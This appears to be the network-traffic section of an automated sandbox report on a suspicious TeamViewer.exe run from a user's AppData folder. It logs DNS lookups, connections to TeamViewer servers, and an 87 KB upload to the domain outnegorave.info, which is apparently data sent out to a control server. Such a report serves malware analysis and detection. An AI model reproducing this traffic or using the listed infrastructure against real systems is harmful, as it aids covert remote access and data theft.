                                                                                                                      Sep 15, 2021 14:08:01.585436106 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.587244987 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.623857975 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627022028 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627052069 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627109051 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.627151966 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808084965 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808274031 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.847999096 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.235275030 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.278043985 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.278857946 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336889029 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336922884 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336926937 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.376280069 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.376321077 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377862930 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377959967 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.378012896 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.422226906 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.731400013 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731461048 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731515884 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731573105 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.770566940 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770778894 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770806074 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770868063 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.770908117 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.770927906 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770970106 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.771090031 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.771151066 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:03.447949886 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.448004007 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.448137045 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.491561890 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.491594076 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.544971943 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.554230928 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.565861940 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.565896988 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.566315889 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.569859982 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575009108 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575213909 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575308084 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575320959 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.575489044 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575539112 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.575915098 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575965881 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.576409101 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.576464891 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.579519987 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.579540014 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.579731941 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.579747915 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.579889059 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.623191118 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.602396011 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.602509975 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:04.602520943 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.602581978 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:04.602869034 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:04.603609085 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.603674889 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:28.278345108 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:28.278428078 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:28.282900095 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:28.364269972 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:53.278769970 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:53.278851032 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:53.279131889 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:53.358046055 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.684334993 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.684380054 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.684619904 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.685610056 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.685631990 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.729605913 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.729973078 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.730829000 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.730837107 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.731583118 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.731600046 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.731756926 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.731765985 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.731897116 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.731903076 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.732135057 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.732151985 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.732676029 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.732707024 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.733009100 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.733036995 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.733330011 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.733345032 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.403100967 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.403352022 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:08.403363943 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.403745890 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:08.403975010 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:08.404340982 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.405304909 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:18.279109001 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:18.279416084 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:18.280694962 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:18.359952927 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:43.279575109 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:43.279683113 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:43.282150984 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:43.362061977 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:49.346477985 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:49.658139944 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:50.267776012 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:51.470997095 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:53.877405882 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:58.690196037 CEST4975580192.168.2.6185.188.32.1

                                                                                                                      UDP Packets


                                                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 14:07:59.058855057 CEST | 192.168.2.6 | 8.8.8.8 | 0x281 | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 14:07:59.112746000 CEST | 192.168.2.6 | 8.8.8.8 | 0xa930 | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 14:08:00.839952946 CEST | 192.168.2.6 | 8.8.8.8 | 0x6a24 | Standard query (0) | master1.teamviewer.com | A (IP address) | IN (0x0001)
Sep 15, 2021 14:08:03.412535906 CEST | 192.168.2.6 | 8.8.8.8 | 0x66a0 | Standard query (0) | outnegorave.info | A (IP address) | IN (0x0001)

                                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 14:07:59.094980001 CEST | 8.8.8.8 | 192.168.2.6 | 0x281 | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 14:07:59.150213003 CEST | 8.8.8.8 | 192.168.2.6 | 0xa930 | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 14:08:00.878603935 CEST | 8.8.8.8 | 192.168.2.6 | 0x6a24 | No error (0) | master1.teamviewer.com |  | 185.188.32.1 | A (IP address) | IN (0x0001)
Sep 15, 2021 14:08:03.445225954 CEST | 8.8.8.8 | 192.168.2.6 | 0x66a0 | No error (0) | outnegorave.info |  | 172.67.205.33 | A (IP address) | IN (0x0001)
Sep 15, 2021 14:08:03.445225954 CEST | 8.8.8.8 | 192.168.2.6 | 0x66a0 | No error (0) | outnegorave.info |  | 104.21.77.64 | A (IP address) | IN (0x0001)

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • outnegorave.info
                                                                                                                      • master1.teamviewer.com
                                                                                                                      • 37.252.232.109

                                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49758 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49834 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49839 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49752 | 185.188.32.1 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:00.918462038 CEST | 925 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:00.940159082 CEST | 925 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 33 32 31 37 32 39 36 35
Data Ascii: $32172965
Sep 15, 2021 14:08:00.958070040 CEST | 926 | OUT | GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:00.980880976 CEST | 926 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 14:08:01.008373976 CEST | 926 | OUT | GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.029356003 CEST | 926 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 16
Data Raw: 17 24 13 0b 00 98 20 19 9c 98 98 1b 99 19 1b 1b
Data Ascii: $


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49753 | 185.188.32.1 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.058862925 CEST | 927 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.080029964 CEST | 927 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 33 32 31 37 32 39 36 39
Data Ascii: $32172969
Sep 15, 2021 14:08:01.084237099 CEST | 928 | OUT | GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.105293989 CEST | 928 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 14:08:01.106717110 CEST | 928 | OUT | GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.128108978 CEST | 929 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 9
Data Raw: 17 24 13 04 00 98 20 27 a5
Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49754 | 185.188.32.1 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.155966043 CEST | 929 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.179565907 CEST | 929 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 33 32 31 37 32 39 37 33
Data Ascii: $32172973
Sep 15, 2021 14:08:01.183722973 CEST | 930 | OUT | GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.204659939 CEST | 930 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 14:08:01.209389925 CEST | 931 | OUT | GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.230426073 CEST | 931 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 9
Data Raw: 17 24 13 04 00 98 20 27 a5
Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.6 | 49755 | 185.188.32.1 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.259424925 CEST | 932 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.282213926 CEST | 932 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 33 32 31 37 32 39 37 38
Data Ascii: $32172978
Sep 15, 2021 14:08:01.287225962 CEST | 932 | OUT | GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.309426069 CEST | 933 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 14:08:01.314114094 CEST | 933 | OUT | GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master1.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.335100889 CEST | 934 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 443


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.6 | 49756 | 37.252.232.109 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.395808935 CEST | 934 | OUT | GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 37.252.232.109
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.435075998 CEST | 934 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 17
Data Raw: 17 24 66 61 73 74 31 32 38 35 32 34 30 38
Data Ascii: $fast12852408
Sep 15, 2021 14:08:01.542887926 CEST | 935 | IN | Data Raw: 31
Data Ascii: 1
Sep 15, 2021 14:08:01.584625006 CEST | 935 | IN | Data Raw: 32
Data Ascii: 2
Sep 15, 2021 14:08:01.627022028 CEST | 936 | IN | Data Raw: 33
Data Ascii: 3
Sep 15, 2021 14:08:01.808084965 CEST | 936 | OUT | POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 37.252.232.109
Content-Length: 500000
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.808274031 CEST | 936 | OUT | Data Raw: 17 24 10 04 00 85 a5 27 8b
Data Ascii: $'
Sep 15, 2021 14:08:28.282900095 CEST | 1452 | OUT | Data Raw: 17 24 1b 00 00
Data Ascii: $
Sep 15, 2021 14:08:53.279131889 CEST | 5972 | OUT | Data Raw: 17 24 1b 00 00
Data Ascii: $


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49757 | 37.252.232.109 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.495162010 CEST | 935 | OUT | POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 37.252.232.109
Content-Length: 3
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:01.495203018 CEST | 935 | OUT | Data Raw: 31
Data Ascii: 1
Sep 15, 2021 14:08:01.544800043 CEST | 935 | OUT | Data Raw: 32
Data Ascii: 2
Sep 15, 2021 14:08:01.587244987 CEST | 935 | OUT | Data Raw: 33
Data Ascii: 3
Sep 15, 2021 14:08:01.627052069 CEST | 936 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 14:08:02.235275030 CEST | 937 | OUT | GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 37.252.232.109
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 14:08:02.278043985 CEST | 937 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 500000
Data Raw: 17 24 11 04 00 94 03 ef 2e
Data Ascii: $.
                                                                                                                      Sep 15, 2021 14:08:28.278345108 CEST1452INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $
                                                                                                                      Sep 15, 2021 14:08:53.278769970 CEST5972INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $
                                                                                                                      Sep 15, 2021 14:09:18.279109001 CEST6086INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $
                                                                                                                      Sep 15, 2021 14:09:43.279575109 CEST6087INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $


                                                                                                                      HTTPS Proxied Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.6  49758        172.67.205.33   443               C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp                kBytes transferred  Direction  Data
2021-09-15 12:08:03 UTC  0                   OUT        POST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 87812
                                                                                                                      Content-Type: multipart/form-data; boundary=--------2771230636
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
2021-09-15 12:08:04 UTC  85                  IN         HTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:08:04 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=ddccde455271131aa0b714df2720e21d55a3a6bfbd1d37b175bcd503cf90f9d2; expires=Thu, 15-Sep-2022 12:08:03 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
